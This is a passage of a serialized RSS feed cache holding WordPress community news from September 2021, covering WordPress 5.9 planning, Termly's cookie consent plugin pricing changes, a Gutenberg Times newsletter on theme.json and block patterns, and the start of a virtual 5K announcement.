Theme\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=122326\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:245:\"https://wptavern.com/wordpress-5-9-proposed-scope-major-push-towards-full-site-editing-plus-a-new-default-theme?utm_source=rss&utm_medium=rss&utm_campaign=wordpress-5-9-proposed-scope-major-push-towards-full-site-editing-plus-a-new-default-theme\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3727:\"<p>WordPress 5.9 is starting to take shape as Josepha Haden Chomphosy published a <a href=\"https://make.wordpress.org/core/2021/09/03/wordpress-5-9-planning-roundup/\">planning roundup</a> at the end of last week with a tentative schedule and scope. This will be the last major release of the year, which Haden Chomphosy said will require &ldquo;a slightly larger release squad,&rdquo; considering the proposed scope. </p>\n\n\n\n<p>The squad leads have not yet been named with the exception of Matt Mullenweg as release lead, Haden Chomphosy as marketing lead, and Jonathan Bossenger who was invited to be a technical writer as part of a small experiment in the 5.9 release cycle. Bossenger said this new role was created &ldquo;to get the technical details of new releases translated into accessible and actionable information for other contributor teams.&rdquo; The rest of the team will be named as features are confirmed to land in the release.</p>\n\n\n\n<p>&ldquo;The main goal for 2021 is&nbsp;getting full site editing to all WordPress users,&rdquo; Haden Chomphosy said as a preface to the scope of work outlined for 5.9. These include the following <a href=\"https://make.wordpress.org/core/2021/08/13/preliminary-road-to-5-9/\">block and site editing features</a> that Matias Ventura previously identified as already underway in Gutenberg: </p>\n\n\n\n<ul><li>Blocks + intrinsic web design</li><li>Navigation menus</li><li>Interface for theme.json</li><li>Refining editing flows for&nbsp;block&nbsp;themes</li><li>New default theme</li><li>Additional design tools</li></ul>\n\n\n\n<p>A few other items are being considered for the roadmap but may not be ready in time. These include: </p>\n\n\n\n<ul><li>Pattern insertion + creation</li><li>Unzip/Rollback Failsafes</li><li>PHPUnit Tests</li><li>Improved compatibility with PHP 8.0 and 8.1</li></ul>\n\n\n\n<p>The proposed timeline puts the go/no go date for features at October 12, with Beta 1 arriving November 16, and the general release on December 14. </p>\n\n\n\n<p>While this timeline seems ambitious for the proposed features, work on many of these efforts has already been happening for months via the Gutenberg plugin. The continual work happening alongside core in the plugin has many advantages but also introduces some complexity into the release process. </p>\n\n\n\n<p>One common complaint logged on the <a href=\"https://make.wordpress.org/core/2021/07/28/wordpress-5-8-tatum-retrospective/\">5.8 retrospective</a> was that backporting&nbsp;PHP&nbsp;changes from the&nbsp;Gutenberg&nbsp;plugin&nbsp;to WordPress&nbsp;core was a significant pain point for contributors.</p>\n\n\n\n<p>&ldquo;The current structure of the Gutenberg plugin makes it really hard to locate the changes necessary to bring to WordPress core together with related&nbsp;JavaScript&nbsp;logic,&rdquo; Greg Zi&oacute;&#322;kowski said. &ldquo;Before anything else, we should make it more transparent in the plugin what&rsquo;s already in WordPress core, what&rsquo;s ready to be backported, and what&rsquo;s still an experiment.&rdquo; Zi&oacute;&#322;kowski has opened a <a href=\"https://github.com/WordPress/gutenberg/issues/33810\">ticket</a> to discuss how contributors can make backporting a more&nbsp;semi-automated process.</p>\n\n\n\n<p>Meanwhile <a href=\"https://make.wordpress.org/core/2021/09/01/wordpress-5-8-1-rc-1/\">5.8.1 RC 1</a> is on deck with <a href=\"https://core.trac.wordpress.org/query?status=closed&milestone=5.8.1&group=status&col=id&col=summary&col=milestone&col=owner&col=type&col=status&col=priority&order=priority\">41 bug fixes</a> for core and <a href=\"https://github.com/WordPress/gutenberg/pull/34393\">20 bug fixes</a> for the block editor. The minor release is expected to land this week.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 08 Sep 2021 05:11:18 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:27;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"WPTavern: Termly Responds to Feedback, Updates Its Cookie Consent Banner Limits\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=122063\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:201:\"https://wptavern.com/termly-responds-to-feedback-updates-its-cookie-consent-banner-limits?utm_source=rss&utm_medium=rss&utm_campaign=termly-responds-to-feedback-updates-its-cookie-consent-banner-limits\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:7424:\"<p class=\"has-drop-cap\">In July, Termly <a href=\"https://termly.io/wordpress-plugin/\">announced its acquisition</a> of the GDPR/CCPA Cookie Consent Banner plugin. The new direction was an <a href=\"https://wptavern.com/termly-acquires-gdpr-ccpa-cookie-consent-banner-turns-free-plugin-into-a-commercial-saas-product\">overhaul of the WordPress extension</a>, turning what was once a free offering into, essentially, a commercial SaaS product. Users could run the service for up to 100 visitors. After that, the cheapest tier would cost $180 per year.</p>\n\n\n\n<p>Despite multiple notices that changes were coming and making sure auto-updates were disable so that users would find no surprises, the move has not sat well with many people. Since the plugin update, users have taken to the WordPress.org review system. Across the board, they have left nothing but <a href=\"https://wordpress.org/support/plugin/uk-cookie-consent/reviews/\">one-star ratings</a> in the past month and a half.</p>\n\n\n\n<p>The free tier limit of 100 monthly visitors did not feel <em>free</em> at all to many. By the middle of August, the Termly team had <a href=\"https://termly.io/wordpress-plugin-update/\">responded after listening to this feedback</a> and making some changes.</p>\n\n\n\n<p>The company bumped the limit to 10,000 unique visitors, making it a free solution for far more users. Termly is also dedicating more team members to responding to questions on the WordPress forums.</p>\n\n\n\n<p>&ldquo;Termly has offered a consent management solution for years, and our pricing structure has been this way for 1,000s of existing customers,&rdquo; said Raffaele Riconosciuto, Director of Marketing at Termly, when asked whether the 100-visitor limit came up in discussions before launch. &ldquo;In all honesty, we simply did not consider it since our new customers view our pricing structure favorably. In hindsight, the structure is less favorable for people who are currently getting something for free, and thus why we made the changes as quickly as we could.&rdquo;</p>\n\n\n\n<p>A 10,000 visitor limit on the free tier is likely to be a much more reasonable limit for the average website. Beyond that, site owners will need to account for a monthly or yearly fee.</p>\n\n\n\n<p>Some users may still have issues with the plugin being rolled into a SaaS offering, needing to sign up for a third-party service. However, Riconosciuto said Termly needed to go in this direction.</p>\n\n\n\n<p>&ldquo;The SaaS structure we&rsquo;ve adopted is ubiquitous for most consent management platforms (CMPs) today,&rdquo; he said. &ldquo;Given that data privacy laws are constantly evolving, as are mechanisms for tracking users on the web, CMPs require a high degree of maintenance and upkeep just to keep their users meeting base legal requirements. We are also continuing to develop new functionality to make the process more painless and robust. Hence why we charge a recurring subscription cost to our more advanced users, who subsidize the always-free tier.&rdquo;</p>\n\n\n\n<p>Termly already had a robust platform in place that serves customers inside and outside of the WordPress ecosystem. It did not make sense to rebuild the entire platform within the plugin and maintain them separately. It would have created duplicate development work without a need to do so.</p>\n\n\n\n<p>Users can still install the cookie consent banner without leaving the WordPress admin panel, but further customizations happen via the Termly dashboard. Riconosciuto said the team may extend the UI integration between the plugin and service in the future if that is where user feedback leads them, pulling more functionality into WordPress.</p>\n\n\n\n<p>The other side of this is that previous plugin versions were not compliant with several data privacy laws, including the GDPR and ePrivacy Directive.</p>\n\n\n\n<p>&ldquo;The GDPR and ePrivacy Directive are the main EU legislation governing the use of cookies and similar tracking technologies,&rdquo; said Riconosciuto. &ldquo;In the context of cookie consent management and cookie banners, the most important takeaway is that a business must obtain consent from an end-user before they serve them non-essential cookies. Consent must be free, specific, informed, and unambiguous. The old banner does not block cookies or contain the information required to ensure when an individual interacts with the banner, they have provided consent to the satisfaction of these legal requirements.&rdquo;</p>\n\n\n\n<p>Of the legal mazes businesses must navigate, Riconosciuto said that each EU member state had &ldquo;transposed the ePrivacy Directive into local cookie laws.&rdquo; Termly looks at the guidance issued from each of these member state regulators when determining how to implement the cookie banner.</p>\n\n\n\n<p>&ldquo;Why does following the law and related guidance matter?&rdquo; asked Riconosciuto. &ldquo;Recently, we have seen regulators in these regions taking enforcement action against entities that fail to comply with the guidance they have provided for how to comply with the cookie laws. Unlike the GDPR, ePrivacy directive, and France&rsquo;s cookie law, guidance, and recommendations from an EU regulator is considered &lsquo;soft law&rsquo; and not binding. However, the guidance typically explains how a regulator will determine if a business is violating a local cookie law (i.e., how they will enforce the cookie law). That means if your business&rsquo;s cookie practices fail to satisfy the requirements laid out in regulator guidance, you are likely violating cookie law and may be subject to enforcement action. Even more, organizations in the EU like <a href=\"https://noyb.eu/en\">NYOB</a> are relying on these laws and soft guidance to determine whether they will file draft complaints with regulators against businesses in violation of these laws.&rdquo;</p>\n\n\n\n<p>Riconosciuto mentioned several areas where the older versions of the plugin did not comply with the laws. However, the updated plugin and service take care of these issues. The following is a non-exhaustive list:</p>\n\n\n\n<ol><li>The solution must actually block cookies and tracking. Cookie consent banners must honor user choices.</li><li>The language must adequately notify users of what they are agreeing to before consenting.</li><li>Consent banners must allow the granular selection of cookies by category (e.g., performance and functionality, advertising, analytics, social networking, etc.).</li><li>Provide clean and easily accessible information and options for accepting or rejecting at the first level without being deceptive (e.g., all buttons should be the same size and format).</li><li>The banner must generate and save an audit log of consent interactions. These may need to be presented to regulators.</li></ol>\n\n\n\n<p>While users may continue using an older version of the plugin, Termly does not recommend it because it is non-compliant. The company has no plans to restore any parts from the previous version.</p>\n\n\n\n<p>&ldquo;We are committed to making sure businesses are educated and compliant the right way,&rdquo; said Riconosciuto. &ldquo;Termly is built on quality, trust, and collaboration, and we can promise that we will continue to listen to feedback and adjust our platform to accommodate all of our customers &mdash; including the WordPress community &mdash; without sacrificing compliance to all laws and regulations.&rdquo;</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 07 Sep 2021 21:34:15 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:28;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:112:\"Gutenberg Times: Standardization for theme.json, Blocks without Build process, Patterns – Weekend Edition #183\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://gutenbergtimes.com/?p=18886\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:116:\"https://gutenbergtimes.com/standardization-for-theme-json-blocks-without-build-process-patterns-weekend-edition-183/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:15064:\"<p class=\"has-text-align-right has-small-font-size\"><em>Featured Image: Photo by <a href=\"https://unsplash.com/@nicknice?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText\">Nick Nice</a> on <a href=\"https://unsplash.com/?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText\">Unsplash</a></em></p>\n\n\n\n\n\n\n<p>Howdy, </p>\n\n\n\n<p>And suddenly, the summer is mostly over. Among other things, one notices the increased activity in the WordPress space and the growing length of all the newsletters. </p>\n\n\n\n<p>This week, the core team managed two releases: <a href=\"https://make.wordpress.org/core/2021/09/01/wordpress-5-8-1-rc-1/\">WordPress 5.8.1 RC</a> with a few bug fixes, and <a href=\"https://make.wordpress.org/core/2021/09/01/whats-new-in-gutenberg-11-4-1-september/\">Gutenberg plugin 11.4</a>. Grzegorz and I discussed details and more in  our <a href=\"https://gutenbergtimes.com/podcast/changelog-51-new-gallery-block-theme-json/\">51st episode of the Gutenberg Changelog podcast.</a></p>\n\n\n\n<p>The Gutenberg developer team received reinforcements with the <a href=\"https://frontity.org/blog/frontity-is-joining-automattic/\">Frontity team, who joined Automattic&#8217;s Dotorg Division.</a> WordPress Tavern&#8217;s Sarah Gooding has more details on this story: <a href=\"https://wptavern.com/automattic-acquires-frontity-founders-to-work-full-time-on-gutenberg\">Automattic Acquires Frontity, Founders to Work Full-Time on Gutenberg</a>. </p>\n\n\n\n<p>With all the excitement around new beginnings, we also need to say <a href=\"https://andreamiddleton.blog/2021/08/30/thanks-for-a-great-10-years-wordpress/\">Farewell to Andrea Middleton</a>. Soon, she will leave the WordPress space to enrich the communities on Reddit with her leadership brilliance. I wouldn&#8217;t be where I am without Andrea&#8217;s encouragement, support, and guidance. I will be eternally grateful for all her work in the WordPress community, her big heart and for her friendship. It&#8217;s hard to imagine WordPress without her. </p>\n\n\n\n<p>I have been blown away by all the kind words from so many of you on Twitter, Slack, and email. Thank you all so much! You really made me feel the love. There will be group hugs at in-person events!  </p>\n\n\n\n<p>With that, I leave you to the brilliant minds writing and experimenting with Gutenberg and sharing their lessons learned. </p>\n\n\n\n<p>Yours, ?<br />Birgit</p>\n\n\n\n\n<p> <strong>Subscribe to the&nbsp;<a href=\"https://gutenbergtimes.com/podcast/\">Gutenberg Changelog</a>&nbsp;podcast </strong><br />?️&nbsp;<a href=\"https://open.spotify.com/show/620NwVKQJGdTupy36zYxvg?mc_cid=4b6c9f88fe\">Spotify</a>&nbsp;|&nbsp;<a href=\"https://podcasts.google.com/feed/aHR0cHM6Ly9ndXRlbmJlcmd0aW1lcy5jb20vZmVlZC9wb2RjYXN0\">Google</a>&nbsp;|&nbsp;<a href=\"https://podcasts.apple.com/us/podcast/gutenberg-changelog/id1469294475\">iTunes</a>&nbsp;|&nbsp;<a href=\"https://pca.st/podcast/f8445ec0-7508-0137-f267-1d245fc5f9cf\">PocketCasts</a>&nbsp;|&nbsp;<a href=\"https://www.stitcher.com/show/gutenberg-changelog\">Stitcher</a>&nbsp;|<br />?️&nbsp;<a href=\"https://www.podbean.com/podcast-detail/chi7j-9904a/Gutenberg-Changelog-Podcast\">Pod Bean</a>&nbsp;|&nbsp;<a href=\"https://castbox.fm/channel/Gutenberg-Changelog-id2173375\">CastBox</a>&nbsp;|&nbsp;<a href=\"https://www.podchaser.com/podcasts/gutenberg-changelog-878239/\">Podchaser</a>&nbsp;|&nbsp;<a href=\"https://gutenbergtimes.com/feed/podcast\">RSS Feed</a>&nbsp;</p>\n\n\n\n<img />\n\n\n\n\n<h2>WordPress 5.9 </h2>\n\n\n\n<p><strong>Josepha Haden Chomphosy</strong> publish the <a href=\"https://make.wordpress.org/core/2021/09/03/wordpress-5-9-planning-roundup/\">WordPress 5.9 Planning Roundup</a> outlining the schedule and scope of the last WordPress release for 2021. </p>\n\n\n\n<p>Go/NoGo Decision will be made on or around October 12, 2012, followed by the Feature Freeze / Bug Fixes deadline of November 9th. A week later, on November 16, Beta 1 would be released. Between Beta 1 and the final release date are roughly four weeks. The final release is set for December 14th, 2021</p>\n\n\n\n<p>The scope matches pretty much what <a href=\"https://make.wordpress.org/core/2021/08/13/preliminary-road-to-5-9/\">Matias Ventura onlined in his &#8220;Road to 5.9</a>&#8221; plus a new default theme.</p>\n\n\n\n<p>Chomphosy also mentioned some roadmap hopefuls, mostly PHP related; among them the Pattern insertion and creation for submission to the directory. </p>\n\n\n\n<p>She ended the post with a call for volunteer for Triage Lead and Release Coordinators, positions that need to be covered to get a release started. If you are interest, comment on the post on the Make Core blog. </p>\n\n\n\n\n<p><strong> <a href=\"https://make.wordpress.org/core/handbook/references/keeping-up-with-gutenberg-index/\" target=\"_blank\" rel=\"noreferrer noopener\">&#8220;Keeping up with Gutenberg &#8211; Index 2021&#8221;</a> </strong><br />A chronological list of the WordPress Make Blog posts from various teams involved in Gutenberg development: Design, Theme Review Team, Core Editor, Core JS, Core CSS, Test and Meta team from Jan. 2021 on. Updated by yours truly.  </p>\n\n\n\n\n<h2>Block Patterns</h2>\n\n\n\n<p><strong>Anne McCarthy</strong> published a <a href=\"https://youtu.be/mnymixFx1iw\"><strong>Video On Block Patterns</strong></a> and took “a look at the power of patterns, where you can currently find them, how you can start creating your own, and what&#8217;s to come in future releases”. </p>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<p>The meta team is working on a new component called the <strong>“Pattern Creator”</strong> to empower designers and site builders to submit Block Patterns to the directory, too. <a href=\"https://github.com/WordPress/pattern-directory/issues?q=is%3Aopen+is%3Aissue+milestone%3A%22Pattern+Creation%22+label%3A%22%5BComponent%5D+Pattern+Creator%22\">You can follow along and contribute via the GitHub repository</a> </p>\n\n\n\n<h2>Navigation Screen</h2>\n\n\n\n<p><strong>Sarah Gooding</strong> wrote about the Hallway Hangout where Gutenberg developers discussed what issues needed to be solved for the Navigation screen to make it out of the experimental state within Gutenberg plugin. <a href=\"https://wptavern.com/gutenberg-contributors-get-organized-to-move-block-based-navigation-forward\"><strong>Gutenberg Contributors Get Organized to Move Block-Based Navigation Forward</strong></a></p>\n\n\n\n<h2>Full-Site Editing and Theme.json for Theme Builders</h2>\n\n\n\n<p><strong>Ellen Bauer</strong> of Elmastudio, wrote about her <a href=\"https://www.elmastudio.de/en/lessons-learned-building-our-first-block-theme-for-full-site-editing/\"><strong>Lessons learned building our first block theme for Full Site Editing</strong></a>. As early adopter, she wrote: &#8220;Converting <a href=\"https://wpaino.com/\">Aino </a>to a block theme was our first big step towards this new WordPress theme era. We feel this was important so we and our theme users can now explore block themes more deeply. From here we can learn and add new features step by step.&#8221; Justin Tadlock recently posted <a href=\"https://wptavern.com/a-second-look-at-elmastudios-aino-theme-and-companion-block-plugin\">a review of the Aino theme and plugin</a>. </p>\n\n\n\n<p>Bauer also published a tutorial on <a href=\"https://wpaino.com/blog/customize-full-site-editing-block-theme-footers/\"><strong>How to Customize the Footer in Full Site Editing Block Themes</strong></a></p>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<p><strong>Marcus Kazmierczak</strong> created a tutorial on <a href=\"https://mkaz.blog/wordpress/using-theme-json-in-a-classic-theme/\">how to use the theme.json feature with a Classic Theme.</a> After describing the various settings for colors, typography, layout and more, Marcus also explains in detail what happens in the background. </p>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<p><strong>Rich Tabor</strong> published a series on <a href=\"https://richtabor.com/standardizing-theme-json-colors/\"><strong>Standardizing Theme.json</strong></a> and covered</p>\n\n\n\n<ul><li><a href=\"https://richtabor.com/standardizing-theme-json-spacing/\">Site Spacing</a></li><li><a href=\"https://richtabor.com/standardizing-theme-json-font-sizes/\">Font Sizes</a>, and </li><li><a href=\"https://richtabor.com/standardizing-theme-json-colors/\">Color Slugs</a></li></ul>\n\n\n\n<p>Tabor wrote: <em>&#8220;By standardizing just a few key high-level entries within a WordPress theme’s theme.json file, we can finally create a class of themes that truly are interchangeable. Interchangeable in&nbsp;function, while remaining distinct in&nbsp;style.&#8221; </em></p>\n\n\n\n<p><strong>Brian Gardner</strong> followed along and shared how he implemented <a href=\"https://frostwp.com/theme-json-font-sizes/\"><strong>Theme.json and Standardizing Font Sizes</strong></a> for the Frost Theme</p>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<p><strong>Tammie Lister</strong> also makes the case for <a href=\"https://ephemeralthemes.com/2021/08/31/the-need-for-standardisation/\"><strong>The need for standardization</strong></a>, by writing about the human aspect, mostly cognitive load and the spark of creativity that comes from limits. Another aspect Lister touches upon is translation, and the many languages, WordPress is translated into. She has a great way explaining the unlimited possibilities, starting with three main colors. </p>\n\n\n\n<p>The biggest argument for basic standardization Lister makes almost as a side note, is the interchangeability of Themes. What happens to all the user choices for color, typography etc., when the site owner switches the Theme? </p>\n\n\n\n<p>This is quite timely as a question. Anne McCarthy is working on a guided exploration of Theme switching as the next round of testing for the FSE outreach program. If you&#8217;d like to participate, join the channel <a href=\"https://wordpress.slack.com/archives/C015GUFFC00\"><strong>#FSE-outreach-experiment</strong></a> of WordPress Slack, that recently celebrated the 400th member. </p>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<p>Speaking of which, Anne McCarth posted the summary of the 9th call for testing on the Make Test blog: <a href=\"https://make.wordpress.org/test/2021/09/03/fse-program-handling-highered-headers-summary/\"><strong>FSE Program Handling HigherEd Headers Summary</strong></a></p>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<p><strong>Jason Crist</strong> compiled the 63rd <a href=\"https://make.wordpress.org/themes/2021/09/03/gutenberg-themes-week-of-august-30-2021/\"><strong>Gutenberg + Themes Roundup</strong></a>. While many issues discussed are about the theme.json file and feature handling, I also found the exploration around a <a href=\"https://github.com/WordPress/gutenberg/pull/33770\"><em>Mosaic View for the Template views of the Site Editor. </em></a></p>\n\n\n\n\n<p><strong><a href=\"https://gutenbergtimes.com/need-a-zip-from-master/\">Need a plugin .zip from Gutenberg&#8217;s main (trunk) branch?</a></strong><br />Gutenberg Times provides daily build for testing and review. <br />Have you been using it? Hit reply and let me know.</p>\n\n\n\n<p><img alt=\"GitHub all releases\" src=\"https://img.shields.io/github/downloads/bph/gutenberg/total?style=for-the-badge\" /></p>\n\n\n\n\n<h2>Building Custom Blocks </h2>\n\n\n\n<p><strong>Iain Poulson</strong> announce the <a href=\"https://www.advancedcustomfields.com/blog/acf-5-10-release-html-escaping-blocks-api-v2-block-preloading-and-more/\"><strong>5.10 Release of Advanced Custom Fields</strong></a></p>\n\n\n\n<ul><li>Block API v2 support</li><li>Block preloading</li><li>Full height button</li></ul>\n\n\n\n<p>It&#8217;s the first big release of ACF for the&nbsp;<a href=\"https://twitter.com/dliciousbrains\">Delicious Brains team</a> </p>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<p><strong>Marcus Kazmierczak</strong> wrote on how to <strong><a href=\"https://mkaz.blog/wordpress/make-your-own-create-block-templates/\">Make your own create-block templates</a>.</strong> First, he explains how the official block building scaffolding tool <code>create-block</code> works. Then, Marcus provides instructions and background on how to customize the template to your block-building needs. You might also enjoy Fabian Kägy and Grzegorz, recorded live session on <a href=\"https://gutenbergtimes.com/tooling-using-create-block-scaffolding-and-3rd-party-templates/\">&#8220;Tooling: Using Create-Block Scaffolding and 3rd Party Templates&#8221;</a> via YouTube. </p>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<p><strong>Helen Hou-Sandi </strong>explained an agency&#8217;s approach to streamline Custom Block development in here post: <a href=\"https://helen.blog/2021/08/exploring-custom-blocks-from-a-php-centric-developer-ux-point-of-view/\"><strong>Exploring custom blocks from a PHP-centric developer UX point of view</strong></a>. </p>\n\n\n\n<p><strong>Riad Benguella</strong> had a similar idea and approached it from a runtime-agnostic point of view. He shared <a href=\"https://github.com/youknowriad/blocky\"><strong>Blocky via GitHub</strong></a>, and wrote: &#8216;The fast way to create WordPress blocks. No more hard JavaScript files, or weird PHP registration.&#8217;</p>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<p><strong>Justin Tadlock</strong> recalled a discussion that started on Twitter with <a href=\"https://twitter.com/markjaquith/status/1432461667187765251\">Mark Jaquith tweet:</a> &#8220;What if building custom blocks for the Block Editor was as easy as supplying attributes and a block of HTML? What if this produced React editing code and PHP rendering code without a build step?”. <a href=\"https://wptavern.com/a-world-where-some-block-development-is-merely-a-templating-system-with-no-build-process\"><strong>A World Where (Some) Block Development Is Merely a Templating System With No Build Process?</strong></a></p>\n\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<p class=\"has-text-align-center\"><strong>Don&#8217;t want to miss the next Weekend Edition? </strong></p>\n\n\n\n<form class=\"wp-block-newsletterglue-form ngl-form ngl-portrait\" action=\"https://gutenbergtimes.com/feed/\" method=\"post\"><div class=\"ngl-form-container\"><div class=\"ngl-form-field\"><label class=\"ngl-form-label\" for=\"ngl_email\">Type in your Email address to subscribe.</label><div class=\"ngl-form-input\"><input type=\"email\" class=\"ngl-form-input-text\" name=\"ngl_email\" id=\"ngl_email\" /></div></div><button class=\"ngl-form-button\">Subscribe</button><p class=\"ngl-form-text\">We hate spam, too and won&#8217;t give your email address to anyone except Mailchimp to send out our Weekend Edition</p></div><div class=\"ngl-message-overlay\"><div class=\"ngl-message-svg-wrap\"></div><div class=\"ngl-message-overlay-text\">Thanks for subscribing.</div></div><input type=\"hidden\" name=\"ngl_list_id\" id=\"ngl_list_id\" value=\"26f81bd8ae\" /><input type=\"hidden\" name=\"ngl_double_optin\" id=\"ngl_double_optin\" value=\"yes\" /></form>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 04 Sep 2021 18:00:36 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Birgit Pauli-Haack\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:29;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"WPTavern: Worldwide WordPress Virtual 5K Set for October 1-30, 2021\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=122127\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:177:\"https://wptavern.com/worldwide-wordpress-virtual-5k-set-for-october-1-30-2021?utm_source=rss&utm_medium=rss&utm_campaign=worldwide-wordpress-virtual-5k-set-for-october-1-30-2021\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2192:\"<div class=\"wp-block-image\"><img /></div>\n\n\n\n<p>Automattic is organizing its 2nd annual <a href=\"https://wwwp5k.run/\">Worldwide WordPress 5K</a> during the month of October this year. Registration for the race is free and participants will have the opportunity to donate to a charity of their choice, with Automattic matching donations up to $50,000.</p>\n\n\n\n<p>Just like <a href=\"https://wordpress.com/blog/2015/10/23/wwwp5k-2015/\">the first Worldwide WP 5K</a> that was held in 2015, the race will be virtual. Anyone is welcome to run, walk, bike, or 